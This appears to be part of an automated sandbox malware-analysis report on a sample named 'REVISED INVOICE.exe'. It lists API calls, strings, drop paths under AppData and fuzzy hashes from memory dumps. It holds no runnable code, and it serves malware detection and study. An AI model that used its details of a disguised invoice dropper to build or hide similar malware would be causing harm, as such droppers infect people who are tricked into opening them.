                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 167947723-0
                                                                                                • Opcode ID: 5da5b43d6b5314da3b6e243800128a6a8307b3d5b775bc4a78521cf42ee0db5a
                                                                                                • Instruction ID: 9b49ef4685d11130b37b7b0c6276d492a5168a4a944959f4997216c5b5c768b0
                                                                                                • Opcode Fuzzy Hash: 5da5b43d6b5314da3b6e243800128a6a8307b3d5b775bc4a78521cf42ee0db5a
                                                                                                • Instruction Fuzzy Hash: 1FF06D72A04204BBE7209F659E88ABF766DEF80354B10843AF505B61D0D6B85D419B6A
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\fona\Kvit,?), ref: 00401E52
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\fona\Kvit, xrefs: 00401E3B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExecuteShell
                                                                                                • String ID: C:\Users\user\AppData\Local\fona\Kvit
                                                                                                • API String ID: 587946157-989027284
                                                                                                • Opcode ID: 53b506568bb0721b107c84be0b2c3bfad465a6700b1750e117177fae49c69c36
                                                                                                • Instruction ID: aff1eb953233667cd0d8f0d555c0d854947fdecc0d20a4db35d539c6ca29440d
                                                                                                • Opcode Fuzzy Hash: 53b506568bb0721b107c84be0b2c3bfad465a6700b1750e117177fae49c69c36
                                                                                                • Instruction Fuzzy Hash: FAF0F636B04100AACF116FB9DD4AEAD33B9AB44724F240577F801F74D6D6FDC9419618
                                                                                                APIs
                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNEL32 ref: 00402CF1
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                • RegCloseKey.KERNEL32(?), ref: 004024F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: f026fbabf7f86d2756df4ea0d93cbbb84a06aa25cae6380f5d54e0d841482863
                                                                                                • Instruction ID: 318f25c97078b56e75ac6278506f01b5a34a300aa28fb7ae5d2085b0d3939190
                                                                                                • Opcode Fuzzy Hash: f026fbabf7f86d2756df4ea0d93cbbb84a06aa25cae6380f5d54e0d841482863
                                                                                                • Instruction Fuzzy Hash: F7117331915205EFDB14CFA4DA489BEB7B4EF44354F20843FE405B72D0D6B85A41DB5A
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32 ref: 004013E4
                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
                                                                                                • Instruction ID: 1e7952006d9e226a8eb598a62733b1cad305e59e596fc6f41a9a7203fe322f79
                                                                                                • Opcode Fuzzy Hash: 1f472dfcc894d90b0504cb8d955b7f6dcf6f20f1f7a064cd725307f95b817da4
                                                                                                • Instruction Fuzzy Hash: 9401D131B24210EBE7295B389C05B6A3698E720318F10867EB915F62F1DA78DC028B5D
                                                                                                APIs
                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNEL32 ref: 00402CF1
                                                                                                • RegDeleteValueW.ADVAPI32 ref: 0040233E
                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                • String ID:
                                                                                                • API String ID: 849931509-0
APIs
• GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
• GetProcAddress.KERNEL32(00000000,?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406422
  • Part of subcall function 00406389: GetSystemDirectoryW.KERNEL32(?,00000104,00000020), ref: 004063A0
  • Part of subcall function 00406389: wsprintfW.USER32 ref: 004063DB
  • Part of subcall function 00406389: LoadLibraryW.KERNEL32(?), ref: 004063EB
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401DF2
• EnableWindow.USER32(00000000,00000000), ref: 00401DFD
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Window$EnableShow
• String ID:
• API String ID: 1136574915-0
APIs
• GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1A
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
APIs
• GetFileAttributesW.KERNELBASE(?,?,004057D4,?,?,00000000,004059AA,?,?,?,?), ref: 00405BD4
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BE8
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,0040325D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004056D0
• GetLastError.KERNEL32 ref: 004056DE
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
APIs
• WritePrivateProfileStringW.KERNEL32 ref: 004022D4
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PrivateProfileStringWrite
• String ID:
• API String ID: 390214022-0
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405C8B
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Open
• String ID:
• API String ID: 71445658-0
                                                                                                APIs
                                                                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 00405CBA
                                                                                                APIs
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403504,?), ref: 00403230
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040531B
                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040532A
                                                                                                • GetClientRect.USER32(?,?,00000004), ref: 00405367
                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040536E
                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538F
                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053A0
                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053B3
                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053C1
                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053D4
                                                                                                • ShowWindow.USER32(00000000,?), ref: 004053F6
                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040540A
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040542B
                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040543B
                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405454
                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405460
                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405339
                                                                                                  • Part of subcall function 00404118: SendMessageW.USER32(00000028,?,00000001,00403F44), ref: 00404126
                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040547D
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005251,00000000), ref: 0040548B
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405492
                                                                                                • ShowWindow.USER32(00000000), ref: 004054B6
                                                                                                • ShowWindow.USER32(?,00000008), ref: 004054BB
                                                                                                • ShowWindow.USER32(00000008), ref: 00405505
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405539
                                                                                                • CreatePopupMenu.USER32 ref: 0040554A
                                                                                                • AppendMenuW.USER32 ref: 0040555E
                                                                                                • GetWindowRect.USER32(?,?), ref: 0040557E
                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405597
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CF
                                                                                                • OpenClipboard.USER32(00000000), ref: 004055DF
                                                                                                • EmptyClipboard.USER32 ref: 004055E5
                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055F1
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004055FB
                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560F
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040562F
                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040563A
                                                                                                • CloseClipboard.USER32 ref: 00405640
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004045CD
• SetWindowTextW.USER32(00000000,?,?), ref: 004045F7
• SHBrowseForFolderW.SHELL32(?), ref: 004046A8
• CoTaskMemFree.OLE32(00000000), ref: 004046B3
• lstrcmpiW.KERNEL32(antireform,00422708,00000000,?,?), ref: 004046E5
• lstrcatW.KERNEL32(?,antireform), ref: 004046F1
• SetDlgItemTextW.USER32(?,000003FB,?,?), ref: 00404703
  • Part of subcall function 00405748: GetDlgItemTextW.USER32(?,?,00000400,0040473A,000003FB,?), ref: 0040575B
  • Part of subcall function 004062B3: CharNextW.USER32(00409300), ref: 00406316
  • Part of subcall function 004062B3: CharNextW.USER32(00409300), ref: 00406325
  • Part of subcall function 004062B3: CharNextW.USER32(00409300), ref: 0040632A
  • Part of subcall function 004062B3: CharPrevW.USER32(00409300,00409300), ref: 0040633D
• GetDiskFreeSpaceW.KERNEL32(004206D8,?,?,0000040F,?,004206D8,004206D8,?,00000001,004206D8,?,?,000003FB,?), ref: 004047C6
• MulDiv.KERNEL32 ref: 004047E1
  • Part of subcall function 0040493A: lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
  • Part of subcall function 0040493A: wsprintfW.USER32 ref: 004049E4
  • Part of subcall function 0040493A: SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
Strings
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
• String ID: A$C:\Users\user\AppData\Local\fona\Kvit$antireform
• API String ID: 2624150263-652568304
• Opcode ID: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
• Instruction ID: 5fc8bddc00f1cc174a6dc329f65f284a7a254117467b0892f0b405221262b822
• Opcode Fuzzy Hash: 9fff75d44962757429dc3e2902d1974289698b17ee3baa263f594784ad652460
• Instruction Fuzzy Hash: D9A150B1D00209ABDB11AFA5CC85AAF77B8EF84315F11843BF611B72D1D77C8A418B69
APIs
• CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040431E
• GetDlgItem.USER32(?,000003E8), ref: 00404332
• SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434F
• GetSysColor.USER32(?), ref: 00404360
• SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040436E
• SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040437C
• lstrlenW.KERNEL32(?), ref: 00404381
• SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040438E
• SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004043A3
• GetDlgItem.USER32(?,0000040A), ref: 004043FC
• SendMessageW.USER32(00000000), ref: 00404403
• GetDlgItem.USER32(?,000003E8), ref: 0040442E
• SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404471
• LoadCursorW.USER32 ref: 0040447F
• SetCursor.USER32(00000000), ref: 00404482
• ShellExecuteW.SHELL32(0000070B,open,004271C0,00000000,00000000,00000001), ref: 00404497
• LoadCursorW.USER32 ref: 004044A3
• SetCursor.USER32(00000000), ref: 004044A6
• SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D5
• SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E7
Strings
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
• String ID: N$antireform$open
• API String ID: 3615053054-2892773833
• Opcode ID: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
• Instruction ID: 4b5324550c8b175de7ac8ee9e9744dd98fad869a56f6e91fb07d2f074fcd5292
• Opcode Fuzzy Hash: 2c4f6cf5a4aa9f0210a02c82683795d0b5a579b88aa58951f10bca9314f1fa64
• Instruction Fuzzy Hash: F87172B1A00209BFDB109F60DD85E6A7B69FB84354F00853AF705B62E1C778AD51CFA9
APIs
• DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
• BeginPaint.USER32(?,?), ref: 00401047
• GetClientRect.USER32(?,?), ref: 0040105B
• CreateBrushIndirect.GDI32(00000000), ref: 004010CF
• FillRect.USER32 ref: 004010E4
• DeleteObject.GDI32(?), ref: 004010ED
• CreateFontIndirectW.GDI32(?), ref: 00401105
• SetBkMode.GDI32(00000000,00000001), ref: 00401126
• SetTextColor.GDI32(00000000,000000FF), ref: 00401130
• SelectObject.GDI32(00000000,?), ref: 00401140
• DrawTextW.USER32(00000000,00428220,000000FF,00000010,00000820), ref: 00401156
• SelectObject.GDI32(00000000,00000000), ref: 00401160
• DeleteObject.GDI32(?), ref: 00401165
• EndPaint.USER32(?,?), ref: 0040116E
Strings
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
• String ID: F
• API String ID: 941294808-1304234792
• Opcode ID: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
• Instruction ID: b0ee482b8836f8c5ddb0523b9b95fc6b4c0959077eeb464a3039c1fdf8a9f2d7
• Opcode Fuzzy Hash: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
• Instruction Fuzzy Hash: F6418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF951AA1A0C738EA51DFA5
APIs
• lstrcpyW.KERNEL32(00425DA8,NUL), ref: 00405D5D
• CloseHandle.KERNEL32(00000000), ref: 00405D81
• GetShortPathNameW.KERNEL32(?,00425DA8,00000400,?,00409300,00405EE1,?,?), ref: 00405D8A
  • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
  • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
• GetShortPathNameW.KERNEL32(004265A8,004265A8,00000400,?,00409300,00405EE1,?,?), ref: 00405DA7
• wsprintfA.USER32 ref: 00405DC5
• GetFileSize.KERNEL32(00000000,00000000,004265A8,C0000000,00000004,004265A8,?,?,?,?,?), ref: 00405E00
• GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0F
• lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E47
• SetFilePointer.KERNEL32(00409578,00000000,00000000,00000000,00000000,004259A8,00000000,-0000000A,00409578,00000000,[Rename],00000000,00000000,00000000), ref: 00405E9D
• GlobalFree.KERNEL32(00000000), ref: 00405EAE
• CloseHandle.KERNEL32(00000000), ref: 00405EB5
  • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
  • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C1A
Strings
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
• String ID: %ls=%ls$NUL$[Rename]
• API String ID: 222337774-899692902
• Opcode ID: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
• Instruction ID: 907d7383bdf99192a2874dfd68d01e77647b980fe5b363d6f0c9d0989479472f
• Opcode Fuzzy Hash: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
• Instruction Fuzzy Hash: 88311F71A05B14BBD6206B229C48F6B3A6CDF45755F14043ABE41F62D2DA3CEE018AFD
APIs
• CharNextW.USER32(00409300), ref: 00406316
• CharNextW.USER32(00409300), ref: 00406325
• CharNextW.USER32(00409300), ref: 0040632A
• CharPrevW.USER32(00409300,00409300), ref: 0040633D
Strings
• *?|<>/":, xrefs: 00406305
• C:\Users\user\AppData\Local\Temp\, xrefs: 004062B4
• "C:\Users\user\Desktop\REVISED INVOICE.exe", xrefs: 004062F7
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\REVISED INVOICE.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-3856209036
• Opcode ID: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
• Instruction ID: 54bf27a4ef4c29ba7f7e7f80dc621db20ebbd613429789f6f10e18307ece98db
• Opcode Fuzzy Hash: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
